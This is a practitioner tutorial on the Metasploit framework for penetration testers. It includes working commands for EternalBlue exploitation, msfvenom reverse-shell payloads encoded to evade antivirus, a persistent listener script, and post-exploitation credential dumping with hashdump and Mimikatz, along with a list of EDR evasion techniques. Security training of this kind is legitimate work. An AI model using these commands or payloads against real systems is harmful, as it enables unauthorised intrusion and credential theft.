Metasploit in 2026: The Practitioner Workflow

Last updated: April 26, 2026

Metasploit is the universal exploitation framework. Every penetration tester knows it; many use it superficially — search for an exploit, set RHOSTS, run, hope for shell. The full Metasploit workflow includes payload customisation, evasion, post-exploitation modules, listener management, and integration with the rest of the toolkit. This article covers the 2026 practitioner workflow with msfconsole.

The mental model

Metasploit consists of:

• Modules — exploits, auxiliaries, payloads, encoders, post-exploitation
• Sessions — established footholds (Meterpreter, shell, etc.)
• Database — workspace tracking hosts, services, vulnerabilities, loot
• Listeners — handlers waiting for incoming sessions

Workspace management

Every engagement should be its own workspace:

msfconsole
msf6 > workspace -a <client_name>
msf6 > db_status
msf6 > workspace

Database (PostgreSQL) tracks hosts, ports, vulnerabilities, credentials. Import Nmap output:

msf6 > db_import /tmp/nmap.xml
msf6 > hosts
msf6 > services
msf6 > vulns

Search and use modules

msf6 > search type:exploit name:eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > show options
msf6 > set RHOSTS 10.0.0.5
msf6 > set LHOST <your-ip>
msf6 > check  # Verify if vulnerable
msf6 > exploit

Always run check before exploit when available. Saves time on misclassified vulnerabilities.

Payload customisation

Default payloads are signatured. Generate custom payloads with msfvenom:

# Windows reverse shell (staged)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o shell.exe

# With encoding for AV evasion
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=443 \
  -e x86/shikata_ga_nai -i 5 -f exe -o shell.exe

# Encrypted reverse shell (less detectable)
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=<ip> LPORT=443 -f exe -o shell.exe

Modern AV catches default Meterpreter signatures within 24 hours. For real engagements, use custom loaders (Donut + custom shellcode runner) — Metasploit’s encoding alone is insufficient.

Listener management

Use multi/handler with the resource-script pattern to maintain listeners across msfconsole restarts:

cat > ~/.msf4/handler.rc << 'EOF'
use multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set ExitOnSession false
exploit -j
EOF

msfconsole -r ~/.msf4/handler.rc

Post-exploitation modules

Once you have a Meterpreter session, the post/ modules automate common tasks:

meterpreter > sysinfo
meterpreter > getuid
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > load kiwi  # Load Mimikatz
meterpreter > kiwi_cmd "sekurlsa::logonpasswords"

Integration with other tools

• Empire / Sliver / Covenant — modern C2 frameworks that Metasploit integrates with for post-exploitation handoff
• BloodHound — once on a domain box, run SharpHound and ingest into BloodHound
• CrackMapExec / NetExec — separate tool but complements Metasploit for SMB/AD discovery

The 2026 reality check

Metasploit-default payloads are reliably detected by modern EDR (CrowdStrike, SentinelOne, Defender). For real-world red-teaming you need:

• Custom loaders to run shellcode
• Process hollowing or DLL sideloading for stealth
• HTTPS C2 with domain fronting
• AMSI/ETW bypasses for in-memory execution

Metasploit remains useful for: lab work, CTF, established-vulnerability exploitation against unpatched targets, post-exploitation modules, the listener infrastructure. For evading modern endpoint defences, custom tooling is required.

The takeaway

Metasploit in 2026 is the workhorse for the unglamorous parts of pentesting — reliable exploits against known CVEs, post-exploitation automation, listener management. For the leading edge of evasion, look elsewhere. Master the framework’s database, workspace, and module workflow; it makes the rest of your toolchain more productive.